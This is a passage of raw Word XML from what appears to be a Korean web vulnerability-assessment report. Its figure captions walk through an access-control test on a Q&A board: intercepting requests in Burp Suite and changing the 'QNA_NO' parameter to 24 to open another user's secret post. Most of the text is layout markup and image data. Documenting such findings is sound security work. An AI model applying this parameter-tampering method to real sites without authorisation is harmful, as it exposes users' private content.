10;AgAAzgQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAG0P&#10;UvngAAAACwEAAA8AAAAAAAAAAAAAAAAA2QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AADmBQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D17B59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B96ADBF" wp14:editId="102301E8">
            <wp:extent cx="4572000" cy="2242673"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="961" name="그림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971" r="1772" b="37198"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="22426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FF0191" w14:textId="6C37CAC3" w:rsidR="009D3308" w:rsidRDefault="00D17B59" w:rsidP="009D3308">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="417" w:name="_Toc209094626"/>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53</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00251380">
        <w:t>. QNA</w:t>
      </w:r>
      <w:r w:rsidR="00251380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00856289">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>페이지에서 B</w:t>
      </w:r>
      <w:r w:rsidR="00856289">
        <w:t xml:space="preserve">urp Suite -&gt; Intercept on </w:t>
      </w:r>
      <w:r w:rsidR="00856289">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>후,</w:t>
      </w:r>
      <w:r w:rsidR="00856289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00251380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공개 게시물에 접근</w:t>
      </w:r>
      <w:bookmarkEnd w:id="417"/>
    </w:p>
    <w:p w14:paraId="1FF8F6FB" w14:textId="77777777" w:rsidR="009D3308" w:rsidRDefault="009D3308" w:rsidP="009D3308">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C62BAA" w14:textId="0D9E5B1C" w:rsidR="009D3308" w:rsidRDefault="009D3308" w:rsidP="009D3308">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251595776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B4947A7" wp14:editId="2A0CD4E9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1115060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1937385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="803564" cy="152400"/>
                <wp:effectExtent l="0" t="0" r="15875" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="965" name="직사각형 965"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="803564" cy="1524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55FC7" id="직사각형 965" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:87.8pt;margin-top:152.55pt;width:63.25pt;height:12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ZxfgIAAM4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDchKW2UTRWlCkKq&#10;2kot6tnx2llL/mPsZFNu5R2QeAMuHHguVN6BsXfbhsIJkYMz45md2e+bb3Z6sjOabAUE5WxFBwcl&#10;JcJyVyu7ruj76+WrI0pCZLZm2llR0VsR6Mns5Ytp6ydi6BqnawEEi9gwaX1Fmxj9pCgCb4Rh4cB5&#10;YTEoHRgW0YV1UQNrsbrRxbAsD4vWQe3BcREC3p52QTrL9aUUPF5IGUQkuqL4bjGfkM9VOovZlE3W&#10;wHyjeP8a7B/ewjBlseljqVMWGdmA+qOUURxccDIecGcKJ6XiImNANIPyGZqrhnmRsSA5wT/SFP5f&#10;WX6+vQSi6ooeH44psczgkO6/3t1/+vbj+93PL59JukeWWh8mmHzlL6H3ApoJ8k6CSf8Ihuwys7eP&#10;zIpdJBwvj8rX48MRJRxDg/FwVGbmi6eHPYT4VjhDklFRwMFlPtn2LERsiKkPKamXdUuldR6etqTF&#10;osflGOfLGWpIahbRNB5RBbumhOk1ipNHyCWD06pOj6dCAdarhQayZSiQ5bLEX0KL7X5LS71PWWi6&#10;vBzqpGNURP1qZRLGvae1TdVFVmCPIDHYcZaslatvkXlwnSSD50uFTc5YiJcMUIOIBvcqXuAhtUOI&#10;rrcoaRx8/Nt9ykdpYJSSFjWN8D9sGAhK9DuLojkejEZpCbIzGr8ZogP7kdV+xG7MwiErA9xgz7OZ&#10;8qN+MCU4c4PrN09dMcQsx94d0b2ziN2u4QJzMZ/nNBS+Z/HMXnmeiieeEr3XuxsGvp9/ROGcuwf9&#10;s8kzGXS5nRDmm+ikyhp54hUnmBxcmjzLfsHTVu77OevpMzT7BQAA//8DAFBLAwQUAAYACAAAACEA&#10;S0UVYd8AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KgdV21KiFMBEkKg&#10;HqDA3Y3dJKq9jmI3CX/PcoLbjPZpdqbczt6x0Q6xC6ggWwhgFutgOmwUfH483WyAxaTRaBfQKvi2&#10;EbbV5UWpCxMmfLfjPjWMQjAWWkGbUl9wHuvWeh0XobdIt2MYvE5kh4abQU8U7h2XQqy51x3Sh1b3&#10;9rG19Wl/9grewunI3ZeUr/nDs8xf/GZqxp1S11fz/R2wZOf0B8NvfaoOFXU6hDOayBz5fLUmVMFS&#10;rDJgRCyFJHEgIW8z4FXJ/2+ofgAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCcgVZxfgIA&#10;AM4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBLRRVh&#10;3wAAAAsBAAAPAAAAAAAAAAAAAAAAANgEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;5AUAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C911AF" wp14:editId="4950A7E4">
            <wp:extent cx="4572000" cy="2347332"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="964" name="그림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46673" r="1626" b="8430"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="23473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C07063" w14:textId="3415B5D7" w:rsidR="00CB4AC1" w:rsidRDefault="009D3308" w:rsidP="00CB4AC1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="418" w:name="_Toc20909462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54</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시물 접근 시 필요한 파라미터 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="418"/>
    </w:p>
    <w:p w14:paraId="732CBA70" w14:textId="77777777" w:rsidR="00CB4AC1" w:rsidRDefault="00CB4AC1" w:rsidP="00CB4AC1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D3369C" w14:textId="44A46E6A" w:rsidR="00CB4AC1" w:rsidRDefault="00CB4AC1" w:rsidP="00CB4AC1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BA7B74C" wp14:editId="3645A6FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1096010</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1962785</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="139700"/>
                <wp:effectExtent l="0" t="0" r="25400" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="967" name="직사각형 967"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1270000" cy="1397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2DDD9" id="직사각형 967" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:86.3pt;margin-top:154.55pt;width:100pt;height:1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1fQIAAM8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdJPQv6yyqaJWQUhV&#10;W6lFPU+8dtaS/7CdbMqtvANS34ALB54LlXdg7N20oXBC5ODMeMbfeD5/s5OTjVZkzX2Q1lR0uDeg&#10;hBtma2mWFf1wM39zTEmIYGpQ1vCK3vFAT6avX01aV/KRbayquScIYkLZuoo2MbqyKAJruIawZx03&#10;GBTWa4jo+mVRe2gRXatiNBgcFq31tfOW8RBw96wL0mnGF4KzeClE4JGoiuLdYl59XhdpLaYTKJce&#10;XCNZfw34h1tokAaLPkGdQQSy8vIPKC2Zt8GKuMesLqwQkvHcA3YzHLzo5roBx3MvSE5wTzSF/wfL&#10;LtZXnsi6ouPDI0oMaHykx6/3j5+//fh+//PhC0n7yFLrQonJ1+7K915AM7W8EV6nf2yGbDKzd0/M&#10;8k0kDDeHo6MB/ihhGBu+HaOXQIvn086H+I5bTZJRUY8vlwmF9XmIXeo2JRUzdi6Vwn0olSEtgo4H&#10;BwkfUERCQURTO2wrmCUloJaoThZ9hgxWyTodT6eDXy5OlSdrQIXM5/mWXbnf0lLtMwhNl5dDnXa0&#10;jChgJXVFj9PhbV/KJHSeJdh3kCjsSEvWwtZ3SL23nSaDY3OJRc4hxCvwKELsBgcrXuIilMUWbW9R&#10;0lj/6W/7KR+1gVFKWhQ1tv9xBZ5Tot4bVM14uL+fpiA7+wdHI3T8bmSxGzErfWqRlSGOsGPZTPlR&#10;bU3hrb7F+ZulqhgCw7B2R3TvnMZu2HCCGZ/Nchoq30E8N9eOJfDEU6L3ZnML3vXvH1E5F3Y7AFC+&#10;kEGXm04aO1tFK2TWyDOvqK3k4NRklfUTnsZy189Zz9+h6S8AAAD//wMAUEsDBBQABgAIAAAAIQCr&#10;e/D73gAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEjcWNpUWkdpOgESQiAO&#10;MOCeNV5brXGqJmvLv8dwgZuf/fT8vXK7uF5MOIbOk4Z0lYBAqr3tqNHw8f5wtQERoiFrek+o4QsD&#10;bKvzs9IU1s/0htMuNoJDKBRGQxvjUEgZ6hadCSs/IPHt4EdnIsuxkXY0M4e7XqokWUtnOuIPrRnw&#10;vsX6uDs5Da/+eJD9p1LP+d2jyp/cZm6mF60vL5bbGxARl/hnhh98RoeKmfb+RDaInnWu1mzVkCXX&#10;KQh2ZL+bPQ9ZmoKsSvm/Q/UNAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU&#10;AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAJN/kNX0CAADP&#10;BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAq3vw+94A&#10;AAALAQAADwAAAAAAAAAAAAAAAADXBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAOIF&#10;AAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23FA63D4" wp14:editId="292393CC">
            <wp:extent cx="4572000" cy="2351868"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10795"/>
            <wp:docPr id="966" name="그림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512" r="1644" b="8515"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="23518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3CE3F" w14:textId="46E20513" w:rsidR="00012CA5" w:rsidRDefault="00CB4AC1" w:rsidP="00012CA5">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc20909462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55</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비밀 게시물의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“QNA_NO” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
    </w:p>
    <w:p w14:paraId="4C03585F" w14:textId="77777777" w:rsidR="00012CA5" w:rsidRDefault="00012CA5" w:rsidP="00012CA5">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5B5102" w14:textId="33F9B655" w:rsidR="00012CA5" w:rsidRDefault="00B75085" w:rsidP="00012CA5">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251470848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0DD49840" wp14:editId="54E9BDD1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1094105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1960880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="845127" cy="131618"/>
                <wp:effectExtent l="0" t="0" r="12700" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="970" name="직사각형 970"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="845127" cy="13161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7273" id="직사각형 970" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:86.15pt;margin-top:154.4pt;width:66.55pt;height:10.3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pwfwIAAM4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMtuEzEU3SPxD5b3dDIhfY06qaJWQUhV&#10;W6lFXd947Iwlv7CdTMqu/ANS/4ANC74LlX/g2jNpS2GFyMK51/dhn+Nz5+h4oxVZcx+kNTUtd0aU&#10;cMNsI82yph+u528OKAkRTAPKGl7TWx7o8fT1q6POVXxsW6sa7gk2MaHqXE3bGF1VFIG1XEPYsY4b&#10;DArrNUR0/bJoPHTYXatiPBrtFZ31jfOW8RBw97QP0mnuLwRn8UKIwCNRNcW7xbz6vC7SWkyPoFp6&#10;cK1kwzXgH26hQRo89LHVKUQgKy//aKUl8zZYEXeY1YUVQjKeMSCacvQCzVULjmcsSE5wjzSF/9eW&#10;na8vPZFNTQ/3kR8DGh/p4evdw+dvP77f/bz/QtI+stS5UGHylbv0gxfQTJA3wuv0j2DIJjN7+8gs&#10;30TCcPNgsluO9ylhGCrflnvlQepZPBU7H+I7bjVJRk09PlzmE9ZnIfap25R0lrFzqRTuQ6UM6bDp&#10;4WgX788ANSQURDS1Q1TBLCkBtURxsuhzy2CVbFJ5qg5+uThRnqwBBTKfj/A33Oy3tHT2KYS2z8uh&#10;lAaVlhH1q6RGjKl4W61MivKswAFBYrDnLFkL29wi8972kgyOzSUecgYhXoJHDSIanKt4gYtQFiHa&#10;waKktf7T3/ZTPkoDo5R0qGmE/3EFnlOi3hsUzWE5maQhyM5kd3+Mjn8eWTyPmJU+schKiRPsWDZT&#10;flRbU3irb3D8ZulUDIFheHZP9OCcxH7WcIAZn81yGgrfQTwzV46l5omnRO/15ga8G94/onDO7Vb/&#10;UL2QQZ+bKo2draIVMmvkiVfUVnJwaLLKhgFPU/ncz1lPn6HpLwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;AMfN9t7fAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj01PhDAQhu8m/odmTLy5rcUVRMpGTYzR&#10;eNBV713aBbLtlNAu4L93POlt3syT96PaLN6xyY6xD6jgciWAWWyC6bFV8PnxeFEAi0mj0S6gVfBt&#10;I2zq05NKlybM+G6nbWoZmWAstYIupaHkPDad9TquwmCRfvswep1Iji03o57J3DsuhbjmXvdICZ0e&#10;7ENnm8P26BW8hcOeuy8pX/L7J5k/+2Jup1elzs+Wu1tgyS7pD4bf+lQdauq0C0c0kTnSucwIVZCJ&#10;gjYQkYn1FbAdHfJmDbyu+P8N9Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAoHp6cH8C&#10;AADOBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAx832&#10;3t8AAAALAQAADwAAAAAAAAAAAAAAAADZBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AOUFAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00012CA5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16224646" wp14:editId="2623EA6C">
            <wp:extent cx="4572000" cy="2348257"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
            <wp:docPr id="968" name="그림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6509" r="2064" b="8776"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="234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97DBB2" w14:textId="41C9F62F" w:rsidR="00A66442" w:rsidRDefault="00012CA5" w:rsidP="00A66442">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="420" w:name="_Toc209094629"/>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56</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Burp Suite -&gt; Intercept on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>후,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “QNA_NO”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 </w:t>
      </w:r>
      <w:r>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 변경</w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w14:paraId="572E0DE3" w14:textId="77777777" w:rsidR="00A66442" w:rsidRDefault="00A66442" w:rsidP="00A66442">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DFD486" w14:textId="7CF5CD3E" w:rsidR="00A66442" w:rsidRDefault="00B75085" w:rsidP="00A66442">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251475968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CCFAF7E" wp14:editId="4AE4EF80">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1216660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2061210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="685800" cy="145473"/>
                <wp:effectExtent l="0" t="0" r="19050" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="971" name="직사각형 971"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="685800" cy="14547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E7157" id="직사각형 971" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:95.8pt;margin-top:162.3pt;width:54pt;height:11.4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q5fgIAAM4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDcl6c+qmypqFYRU&#10;tZVa1PPEa2ct+Q/byabcyjsg9Q24cOC5UHkHxt5tUwonRA7OjGc84+/zN3t0vNGKrLkP0pqajnZK&#10;SrhhtpFmWdMP1/M3B5SECKYBZQ2v6S0P9Hj6+tVR5yq+a1urGu4JFjGh6lxN2xhdVRSBtVxD2LGO&#10;GwwK6zVEdP2yaDx0WF2rYrcs94rO+sZ5y3gIuHvaB+k01xeCs3ghROCRqJri3WJefV4XaS2mR1At&#10;PbhWsuEa8A+30CANNn0qdQoRyMrLP0ppybwNVsQdZnVhhZCMZwyIZlS+QHPVguMZC5IT3BNN4f+V&#10;ZefrS09kU9PD/RElBjQ+0sPXu4fP3358v/t5/4WkfWSpc6HC5Ct36QcvoJkgb4TX6R/BkE1m9vaJ&#10;Wb6JhOHm3sHkoET+GYZG48l4/22qWWwPOx/iO241SUZNPT5c5hPWZyH2qY8pqZexc6kU7kOlDOmw&#10;6GE5SfUBNSQURDS1Q1TBLCkBtURxsuhzyWCVbNLxdDr45eJEebIGFMh8XuJvuNlvaan3KYS2z8uh&#10;lAaVlhH1q6SuKQLcnlYmRXlW4IAgMdhzlqyFbW6ReW97SQbH5hKbnEGIl+BRg4gG5ype4CKURYh2&#10;sChprf/0t/2Uj9LAKCUdahrhf1yB55So9wZFczgaj9MQZGc82d9Fxz+PLJ5HzEqfWGQFZYG3y2bK&#10;j+rRFN7qGxy/WeqKITAMe/dED85J7GcNB5jx2SynofAdxDNz5VgqnnhK9F5vbsC74f0jCufcPuof&#10;qhcy6HPTSWNnq2iFzBrZ8oraSg4OTVbZMOBpKp/7OWv7GZr+AgAA//8DAFBLAwQUAAYACAAAACEA&#10;nuzzg98AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU/DMAyF70j8h8hI3Fi6MNa1NJ0ACSEQ&#10;BxhwzxqvrdY4VZO15d9jTnB7z356/lxsZ9eJEYfQetKwXCQgkCpvW6o1fH48Xm1AhGjIms4TavjG&#10;ANvy/KwwufUTveO4i7XgEgq50dDE2OdShqpBZ8LC90i8O/jBmch2qKUdzMTlrpMqSdbSmZb4QmN6&#10;fGiwOu5OTsObPx5k96XUS3r/pNJnt5nq8VXry4v57hZExDn+heEXn9GhZKa9P5ENomOfLdcc1XCt&#10;Viw4obKMxZ4nq/QGZFnI/z+UPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDc8Uq5fgIA&#10;AM4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCe7POD&#10;3wAAAAsBAAAPAAAAAAAAAAAAAAAAANgEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;5AUAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A66442">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0019FDC4" wp14:editId="4BC4D92A">
            <wp:extent cx="4572000" cy="2358530"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22860"/>
            <wp:docPr id="969" name="그림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14314" r="1900" b="40700"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2358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0D682D" w14:textId="4D002A22" w:rsidR="00012CA5" w:rsidRPr="00012CA5" w:rsidRDefault="00A66442" w:rsidP="00A66442">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="_Toc20909463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57</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비밀 게시물에 접근 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="421"/>
    </w:p>
    <w:p w14:paraId="6B60BCB2" w14:textId="77777777" w:rsidR="00604E1C" w:rsidRDefault="00604E1C" w:rsidP="003667A4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570349C2" w14:textId="77777777" w:rsidR="003667A4" w:rsidRPr="00CB22A6" w:rsidRDefault="003667A4" w:rsidP="003667A4">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3667A4" w:rsidRPr="00B112DB" w14:paraId="3E8C831B" w14:textId="77777777" w:rsidTr="005E1156">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
